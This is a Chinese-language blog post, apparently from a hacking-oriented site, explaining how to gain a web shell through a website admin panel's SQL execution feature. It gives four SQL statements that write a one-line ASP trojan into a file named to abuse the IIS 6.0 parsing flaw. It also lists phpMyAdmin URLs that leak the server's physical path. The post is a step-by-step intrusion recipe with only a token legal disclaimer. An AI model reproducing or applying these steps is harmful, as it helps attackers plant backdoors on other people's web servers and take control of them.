首页 » 技术文章 » 浏览内容

网站后台执行SQL语句导出一句话拿webshell

1496 1 发表评论

实用入侵测试环境往往会遇到一些拿webshell比较棘手的问题。

比如后台无法备份数据库或者没有上传点,等一些常用的拿webshell的方法。

可是在后台存在sql语句执行的功能。如果遇到这样的后台就可以通过SQL语句导出一句话拿webshell。

当然也不是在所有的环境都够利用。

比如: 

(1).网站服务器使用不是IIS6.0版本(因为这里要用到IIS6.0的解析漏洞)

(2).需要知道网站的ACCESS数据库的表段一般默认的比如:admin或者YCMS_admin 

(如果不知道可以下载网站的源程序来分析得到表段

(3).需要知道网站的的物理路径 一般网站后台主页都会存在。 

满足以上条件即可在sql执行语句里面逐一执行以下语句就可以导出一句话了。 

第一句代码 create table cmd (a varchar(50)) 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 

第二句代码 insert into cmd (a) values (‘一句话木马’) 在表cmd的a字段插入一句话木马 

第三句代码 select * into [a] in ‘e:webwebshellcc1.asa;x.xls‘ ‘excel 4.0;’ from cmd 把cmd表a的内容导出到路径e:webwebshellcc1.asa;x.xls文件把这里的路径修改为目标主机的路径 

第四句代码
drop table cmd
删除建立的cmd表


或者使用一段代码来导出SQL语句来获得一句话。 1 代码如下: 注释:

例如:

点击执行后然后直接访问网站的路径后面加上导出的名字也就是一句话的文件名就可以获得一句话的的完整的URL 然后直接进行一句话链接就可以获得webshell了。 


如果不知道网站的物理路径可以在登录phpmyadmin后在后面加入一下地址来爆出网站的路径

phpmyadmin爆路径方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php 
pphpmyadmin/libraries/export/xls.php 
phpmyadmin\themes\darkblue_orange\layout.inc.php 

————————————————————————– 

免责申明:请使用者注意使用环境并遵守国家相关法律法规!

 由于使用不当造成的后果本博客不承担任何责任!

————————————————————————–

标签:

评论 共 1 条 (RSS 2.0) 发表 评论

  1. 会员头像 外链代发说道:

    文章真不错

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥伙伴们喜欢本站赏个好评呗

关注微信

有偿服务

博客统计

  • 日志总数:477 篇
  • 评论数目:1472 条
  • 标签总数:40 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:24 个
  • 建站日期:2011-02-13
  • 运行天数:2123 天
  • 最后更新:2016-12-6

订阅博客

×
订阅图标按钮